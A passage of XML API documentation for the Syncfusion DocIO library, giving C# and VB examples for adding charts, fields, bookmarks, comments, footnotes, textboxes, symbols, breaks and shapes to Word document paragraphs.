                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Create and Append chart to the paragraph
                Dim chart As WChart = paragraph.AppendChart(446, 270)
                'Set chart type
                chart.ChartType = OfficeChartType.Pie
                'Set chart title
                chart.ChartTitle = "Best Selling Products"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                'Set data for chart
                chart.ChartData.SetValue(1, 1, "")
                chart.ChartData.SetValue(1, 2, "Sales")
                chart.ChartData.SetValue(2, 1, "Cote de Blaye")
                chart.ChartData.SetValue(2, 2, 141.396)
                chart.ChartData.SetValue(3, 1, "Thuringer Rostbratwurst")
                chart.ChartData.SetValue(3, 2, 80.368)
                chart.ChartData.SetValue(4, 1, "Raclette Courdavault")
                chart.ChartData.SetValue(4, 2, 71.155)
                chart.ChartData.SetValue(5, 1, "Tarte au sucre")
                chart.ChartData.SetValue(5, 2, 47.234)
                chart.ChartData.SetValue(6, 1, "Camembert Pierrot")
                chart.ChartData.SetValue(6, 2, 46.825)
                chart.ChartData.SetValue(7, 1, "Gnocchi di nonna Alice")
                chart.ChartData.SetValue(7, 2, 42.593)
                chart.ChartData.SetValue(8, 1, "Manjimup Dried Apples")
                chart.ChartData.SetValue(8, 2, 41.819)
                chart.ChartData.SetValue(9, 1, "Alice Mutton")
                chart.ChartData.SetValue(9, 2, 32.698)
                chart.ChartData.SetValue(10, 1, "Carnarvon Tigers")
                chart.ChartData.SetValue(10, 2, 29.171)
                chart.ChartData.SetValue(11, 1, "R�ssle Sauerkraut.")
                'Create a new chart series with the name �Sales�
                Dim pieSeries As IOfficeChartSerie = chart.Series.Add("Sales")
                pieSeries.Values = chart.ChartData(2, 2, 11, 2)
                'Set data label
                pieSeries.DataPoints.DefaultDataPoint.DataLabels.IsValue = True
                pieSeries.DataPoints.DefaultDataPoint.DataLabels.Position = OfficeDataLabelPosition.Outside
                'Set background color
                chart.ChartArea.Fill.ForeColor = Color.FromArgb(242, 242, 242)
                chart.PlotArea.Fill.ForeColor = Color.FromArgb(242, 242, 242)
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                'Set category labels
                chart.PrimaryCategoryAxis.CategoryLabels = chart.ChartData(2, 1, 11, 1)
                'Save the document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendChart(System.IO.Stream,System.Int32,System.String,System.Single,System.Single)">
            <summary>
            Appends chart to the end of the paragraph from the excel file with specified sheet number, range of data, width, and height.
            </summary>
            <param name="excelStream">The excel stream that has data for chart [Excel stream should be "*.xlsx" format].</param>
            <param name="sheetNumber">The <b>integer </b> represents the worksheet number that has data for chart.</param>
            <param name="dataRange">The <b>string</b> represents the data range in the worksheet from which the chart is to be created.</param>
            <param name="width">The <b>float</b> that represents the width for chart.</param>
            <param name="height">The <b>float</b> that represents the height for chart.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WChart"/> instance that represents the newly added chart.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin applications.</remarks>
            <example> The following example illustrates how to append new chart to the paragraph using the excel stream.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the excel file as stream
                Stream excelStream = File.OpenRead("Excel_Template.xlsx");
                //Create and Append chart to the paragraph with excel stream as parameter
                WChart chart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300);
                //Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered;
                chart.ChartTitle = "Purchase Details";
                chart.ChartTitleArea.FontName = "Calibri";
                chart.ChartTitleArea.Size = 14;
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None;       
                //Set name to chart series            
                chart.Series[0].Name = "Sum of Purchases";
                chart.Series[1].Name = "Sum of Future Expenses";
                chart.PrimaryCategoryAxis.Title = "Products";
                chart.PrimaryValueAxis.Title = "In Dollars";
                //Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom;
                //Save the document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the excel file as stream
                Dim excelStream As Stream = File.OpenRead("Excel_Template.xlsx")
                'Create and Append chart to the paragraph with excel stream as parameter
                Dim chart As WChart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300)
                'Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered
                chart.ChartTitle = "Purchase Details"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                'Set name to chart series            
                chart.Series(0).Name = "Sum of Purchases"
                chart.Series(1).Name = "Sum of Future Expenses"
                chart.PrimaryCategoryAxis.Title = "Products"
                chart.PrimaryValueAxis.Title = "In Dollars"
                'Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom
                'Save the document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendField(System.String,Syncfusion.DocIO.FieldType)">
            <summary>
            Appends field to end of the paragraph with the specified field name and field type.
            </summary>
            <param name="fieldName">The <b>string </b>that specifies the field name.</param>
            <param name="fieldType">The <see cref="T:Syncfusion.DocIO.FieldType"/> member that specifies the type of the field.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWField"/> instance of the newly added field.</returns>
            <example> The following example illustrates how to append field to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an instance of WordDocument class (Empty Word Document)
                WordDocument document = new WordDocument();
                //Add a new section into the Word Document
                IWSection section = document.AddSection();
                //Add a new paragraph into Word document and append text into paragraph
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Today's Date: ");
                //Add the new Date field in Word document with field name and its type.
                WField field = paragraph.AppendField("Date", FieldType.FieldDate) as WField;
                //Field code used to describe how to display the date
                field.FieldCode = @"DATE  \@" + "\"MMMM d, yyyy\""; 
                //Save the document in the given name and format
                document.Save("Sample.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an instance of WordDocument class (Empty Word Document)
                Dim document As New WordDocument()
                'Add a new section into the Word Document
                Dim section As IWSection = document.AddSection()
                'Add a new paragraph into Word document and append text into paragraph
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Today's Date: ")
                'Add the new Date field in Word document with field name and its type.
                Dim field As WField = TryCast(paragraph.AppendField("Date", FieldType.FieldDate), WField)
                'Field code used to describe how to display the date
                field.FieldCode = "DATE  \@" + """MMMM d, yyyy"""
                'Save the document in the given name and format
                document.Save("Sample.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendBookmarkStart(System.String)">
            <summary>
            Appends start of the bookmark with specified name to the paragraph.
            </summary>
            <param name="name">The <b>string</b> specifying the bookmark name.</param> 
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/> instance that represents the newly added bookmark start.</returns>
            <example> The following example illustrates how to add a bookmark to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an instance of WordDocument class (Empty Word Document)
                WordDocument document = new WordDocument();
                //Add a new section into the Word Document
                IWSection section = document.AddSection();
                //Add a new paragraph into Word document and append text into paragraph
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Northwind Database");
                paragraph.ParagraphFormat.HorizontalAlignment = Syncfusion.DocIO.DLS.HorizontalAlignment.Center; 
                //Add a paragraph into section
                paragraph = section.AddParagraph();
                //Add a new bookmark start into paragraph with name "Northwind"
                paragraph.AppendBookmarkStart("Northwind");
                //Add a text between the bookmark start and end into paragraph
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.");
                //Add a new bookmark end into paragraph with name " Northwind "
                paragraph.AppendBookmarkEnd("Northwind");
                //Add a text after the bookmark end
                paragraph.AppendText(" Using Northwind, you can become familiar with how a relational database is structured and how the database objects work together to help you enter, store, manipulate, and print your data.");
                //Save the document in the given name and format
                document.Save("Bookmarks.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an instance of WordDocument class (Empty Word Document)
                Dim document As New WordDocument()
                'Add a new section into the Word Document
                Dim section As IWSection = document.AddSection()
                'Add a new paragraph into Word document and append text into paragraph
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Northwind Database")
                paragraph.ParagraphFormat.HorizontalAlignment = Syncfusion.DocIO.DLS.HorizontalAlignment.Center
                'Add a paragraph into section
                paragraph = section.AddParagraph()
                'Add a new bookmark start into paragraph with name "Northwind"
                paragraph.AppendBookmarkStart("Northwind")
                'Add a text between the bookmark start and end into paragraph
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.")
                'Add a new bookmark end into paragraph with name " Northwind "
                paragraph.AppendBookmarkEnd("Northwind")
                'Add a text after the bookmark end
                paragraph.AppendText(" Using Northwind, you can become familiar with how a relational database is structured and how the database objects work together to help you enter, store, manipulate, and print your data.")
                'Save the document in the given name and format
                document.Save("Bookmarks.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendBookmarkEnd(System.String)">
            <summary>
            Appends end of the bookmark with specified name to the paragraph.
            </summary>
            <param name="name">The <b>string</b> specifying the bookmark name.</param> 
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/> instance that represents the newly added bookmark end.</returns>
            <example> The following example illustrates how to add a bookmark to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an instance of WordDocument class (Empty Word Document)
                WordDocument document = new WordDocument();
                //Add a new section into the Word Document
                IWSection section = document.AddSection();
                //Add a new paragraph into Word document and append text into paragraph
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Northwind Database");
                paragraph.ParagraphFormat.HorizontalAlignment = Syncfusion.DocIO.DLS.HorizontalAlignment.Center; 
                //Add a paragraph into section
                paragraph = section.AddParagraph();
                //Add a new bookmark start into paragraph with name "Northwind"
                paragraph.AppendBookmarkStart("Northwind");
                //Add a text between the bookmark start and end into paragraph
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.");
                //Add a new bookmark end into paragraph with name " Northwind "
                paragraph.AppendBookmarkEnd("Northwind");
                //Add a text after the bookmark end
                paragraph.AppendText(" Using Northwind, you can become familiar with how a relational database is structured and how the database objects work together to help you enter, store, manipulate, and print your data.");
                //Save the document in the given name and format
                document.Save("Bookmarks.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an instance of WordDocument class (Empty Word Document)
                Dim document As New WordDocument()
                'Add a new section into the Word Document
                Dim section As IWSection = document.AddSection()
                'Add a new paragraph into Word document and append text into paragraph
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Northwind Database")
                paragraph.ParagraphFormat.HorizontalAlignment = Syncfusion.DocIO.DLS.HorizontalAlignment.Center
                'Add a paragraph into section
                paragraph = section.AddParagraph()
                'Add a new bookmark start into paragraph with name "Northwind"
                paragraph.AppendBookmarkStart("Northwind")
                'Add a text between the bookmark start and end into paragraph
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.")
                'Add a new bookmark end into paragraph with name " Northwind "
                paragraph.AppendBookmarkEnd("Northwind")
                'Add a text after the bookmark end
                paragraph.AppendText(" Using Northwind, you can become familiar with how a relational database is structured and how the database objects work together to help you enter, store, manipulate, and print your data.")
                'Save the document in the given name and format
                document.Save("Bookmarks.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendComment(System.String)">
            <summary>
            Appends the comment to the paragraph.
            </summary>
            <param name="text">The <b>string</b> that specifies the comment.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WComment"/> instance that represents the newly added comment.</returns>
            <example> The following example illustrates how to add a comment to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Creates a new Word document.
                WordDocument document = new WordDocument();
                //Add a section and a paragraph in the document
                document.EnsureMinimal();
                IWParagraph paragraph = document.LastParagraph;
                //Append text to the paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua");
                //Add comment to a paragraph
                WComment comment = paragraph.AppendComment("comment test");
                //Specify the author of the comment
                comment.Format.User = "Peter";
                //Specify the initial of the author
                comment.Format.UserInitials = "St";
                //Save and close the Word document
                document.Save("Comment.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Creates a new Word document.
                Dim document As New WordDocument()
                'Add a section and a paragraph in the document
                document.EnsureMinimal()
                Dim paragraph As IWParagraph = document.LastParagraph
                'Append text to the paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua")
                'Add comment to a paragraph
                Dim comment As WComment = paragraph.AppendComment("comment test")
                'Specify the author of the comment
                comment.Format.User = "Peter"
                'Specify the initial of the author
                comment.Format.UserInitials = "St"
                'Save and close the Word document
                document.Save("Comment.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendFootnote(Syncfusion.DocIO.FootnoteType)">
            <summary>
            Appends footnote or endnotes specified by the type to the paragraph.
            </summary>
            <param name="type">The <see cref="T:Syncfusion.DocIO.FootnoteType"/> member that specifies the type of footnote.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WFootnote"/> instance that represents the newly added footnote.</returns>
            <remarks>The footnotes and endnotes are differentiated by the type of the footnote.</remarks>
            <example> The following example illustrates how to add a footnote to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocumnt document = new WordDocument();
                //Create a section
                IWSection section = document.AddSection();
                //Add a paragraph to a section
                IWParagraph paragraph = section.AddParagraph();
                //Append the text to paragraph
                paragraph.AppendText("Working with footnotes");
                //Formatting the text
                paragraph.ApplyStyle(BuiltinStyle.Heading1);
                //Add a paragraph to a section
                paragraph = section.AddParagraph();
                //Append the footnotes
                WFootnote footnote = (WFootnote) paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Footnote);
                //Set the footnote character format
                footnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript;
                //Inserts the text into the paragraph
                paragraph.AppendText("Sample content for footnotes").CharacterFormat.Bold = true;
                //Add footnote text
                paragraph = footnote.TextBody.AddParagraph();
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Create a section
                Dim section As IWSection = document.AddSection()
                'Add a paragraph to a section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the text to paragraph
                paragraph.AppendText("Working with footnotes")
                'Formatting the text
                paragraph.ApplyStyle(BuiltinStyle.Heading1)
                'Add a paragraph to a section
                paragraph = section.AddParagraph()
                'Append the footnotes
                Dim footnote As WFootnote = DirectCast(paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Footnote), WFootnote)
                'Set the footnote character format
                footnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript
                'Inserts the text into the paragraph
                paragraph.AppendText("Sample content for footnotes").CharacterFormat.Bold = True
                'Add footnote text
                paragraph = footnote.TextBody.AddParagraph()
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                �Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            <para>The following example illustrates how to add a endnote to the paragraph.</para>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new document
                WordDocument document = new WordDocument();
                //Create a section
                IWSection section = document.AddSection();
                //Add a paragraph to a section
                IWParagraph paragraph = section.AddParagraph();
                //Append the text to paragraph
                paragraph.AppendText("Working with endnotes");
                //Formatting the text
                paragraph.ApplyStyle(BuiltinStyle.Heading1);
                //Add a paragraph to a section
                paragraph = section.AddParagraph();
                //Append the endnote
                WFootnote endnote = (WFootnote)  paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Endnote);
                //Set the endnote character format
                endnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript;
                //Insert the text into the paragraph
                paragraph.AppendText("Sample content for endnotes").CharacterFormat.Bold = true;
                //Add footnote text
                paragraph = endnote.TextBody.AddParagraph();
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new document
                Dim document As New WordDocument()
                'Create a section
                Dim section As IWSection = document.AddSection()
                'Add a paragraph to a section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the text to paragraph
                paragraph.AppendText("Working with endnotes")
                'Formatting the text
                paragraph.ApplyStyle(BuiltinStyle.Heading1)
                'Add a paragraph to a section
                paragraph = section.AddParagraph()
                'Append the endnote
                Dim endnote As WFootnote = DirectCast(paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Endnote), WFootnote)
                'Set the endnote character format
                endnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript
                'Insert the text into the paragraph
                paragraph.AppendText("Sample content for endnotes").CharacterFormat.Bold = True
                'Add footnote text
                paragraph = endnote.TextBody.AddParagraph()
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                �Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendTextBox(System.Single,System.Single)">
            <summary>
            Append textbox to the end of the paragraph with the specified width and height.
            </summary>
            <param name="width">The <b>float</b> specifies the width of the textbox.</param>
            <param name="height">The <b>float</b> specifies the height of the textbox.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWTextBox"/> instance that represents the newly added textbox.</returns>
            <example> The following example illustrates how to add a endnote to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Append new textbox to the paragraph
                IWTextBox textbox = paragraph.AppendTextBox(150, 75);
                //Add new text to the textbox body
                IWParagraph textboxParagraph = textbox.TextBoxBody.AddParagraph();
                textboxParagraph.AppendText("Text inside text box");
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append new textbox to the paragraph
                Dim textbox As IWTextBox = paragraph.AppendTextBox(150, 75)
                'Add new text to the textbox body
                Dim textboxParagraph As IWParagraph = textbox.TextBoxBody.AddParagraph()
                textboxParagraph.AppendText("Text inside text box")
                'Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendSymbol(System.Byte)">
            <summary>
            Appends special symbol specified by the character code to end of the paragraph.
            </summary>
            <param name="characterCode">The <b>byte</b> represents the character code of the symbol.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WSymbol"/> instance that represents the newly added symbol.</returns>
            <example> The following example illustrates how to add a symbol to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Example of adding symbols to the paragraph: ");
                //Insert symbol with character code 100
                paragraph.AppendSymbol(100);
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Example of adding symbols to the paragraph: ")
                'Insert symbol with character code 100
                paragraph.AppendSymbol(100)
                'Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendBreak(Syncfusion.DocIO.DLS.BreakType)">
            <summary>
            Appends break of the specified type to end of the paragraph.
            </summary>
            <param name="breakType">The <see cref="T:Syncfusion.DocIO.DLS.BreakType"/> member that specifies the type of break.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.Break"/> instance that represents the newly added break.</returns>
            <example> The following example illustrates how to add a break to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Before line break");
                //Add line break to the paragraph
                paragraph.AppendBreak(BreakType.LineBreak);
                paragraph.AppendText("After line break");
                IWParagraph pageBreakPara = section.AddParagraph();
                pageBreakPara.AppendText("Before page break");
                //Add page break to the paragraph
                pageBreakPara.AppendBreak(BreakType.PageBreak);
                pageBreakPara.AppendText("After page break");
                IWSection secondSection = document.AddSection();
                //Add columns to the section
                secondSection.AddColumn(100, 2);
                secondSection.AddColumn(100, 2);
                IWParagraph columnBreakPara = secondSection.AddParagraph();
                columnBreakPara.AppendText("Before column break");
                //Add column break to the paragraph
                columnBreakPara.AppendBreak(BreakType.ColumnBreak);
                columnBreakPara.AppendText("After column break");
                //Save and Close the document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Before line break")
                'Add line break to the paragraph
                paragraph.AppendBreak(BreakType.LineBreak)
                paragraph.AppendText("After line break")
                Dim pageBreakPara As IWParagraph = section.AddParagraph()
                pageBreakPara.AppendText("Before page break")
                'Add page break to the paragraph
                pageBreakPara.AppendBreak(BreakType.PageBreak)
                pageBreakPara.AppendText("After page break")
                Dim secondSection As IWSection = document.AddSection()
                'Add columns to the section
                secondSection.AddColumn(100, 2)
                secondSection.AddColumn(100, 2)
                Dim columnBreakPara As IWParagraph = secondSection.AddParagraph()
                columnBreakPara.AppendText("Before column break")
                'Add column break to the paragraph
                columnBreakPara.AppendBreak(BreakType.ColumnBreak)
                columnBreakPara.AppendText("After column break")
                'Save and Close the document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendShape(Syncfusion.DocIO.DLS.AutoShapeType,System.Single,System.Single)">
            <summary>
            Appends <see cref="T:Syncfusion.DocIO.DLS.Shape"/> of specified type, width and height to the end of paragraph.
            </summary>
            <param name="autoShapeType">The <see cref="T:Syncfusion.DocIO.DLS.AutoShapeType"/> member that specifies the shape type.</param>
            <param name="width">The <b>float </b> that specifies the width of the shape.</param>
            <param name="height">The <b>float </b> that specifies the height of the shape.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.Shape"/> instance that represents the newly added shape.</returns>
            <example> The following example illustrates how to add a shape to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                //Add new shape to the document
                Shape rectangle = paragraph.AppendShape(AutoShapeType.RoundedRectangle, 150, 100);
                //Set position for shape
                rectangle.VerticalPosition = 72;
                rectangle.HorizontalPosition = 72;
                paragraph = section.AddParagraph() as WParagraph;
                //Add text body contents to the shape
                paragraph = rectangle.TextBody.AddParagraph() as WParagraph;
                IWTextRange text = paragraph.AppendText("This text is in rounded rectangle shape");
                text.CharacterFormat.TextColor = Color.Green;
                text.CharacterFormat.Bold = true;
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                'Add new shape to the document
                Dim rectangle As Shape = paragraph.AppendShape(AutoShapeType.RoundedRectangle, 150, 100)
                'Set position for shape
                rectangle.VerticalPosition = 72
                rectangle.HorizontalPosition = 72
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                'Add text body contents to the shape
                paragraph = TryCast(rectangle.TextBody.AddParagraph(), WParagraph)
                Dim text As IWTextRange = paragraph.AppendText("This text is in rounded rectangle shape")
                text.CharacterFormat.TextColor = Color.Green
                text.CharacterFormat.Bold = True
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close() 
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendHTML(System.String)">
            <summary>
            Appends the HTML text to the end of the paragraph.
            </summary>
            <param name="html">The <b>string</b> that specifies the HTML text.</param>
            <example>The following example illustrates how to append html text to the paragraph.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                IWParagraph paragraph = document.Sections[0].Body.Paragraphs[0];
                //Append the Html string to first paragraph in the document
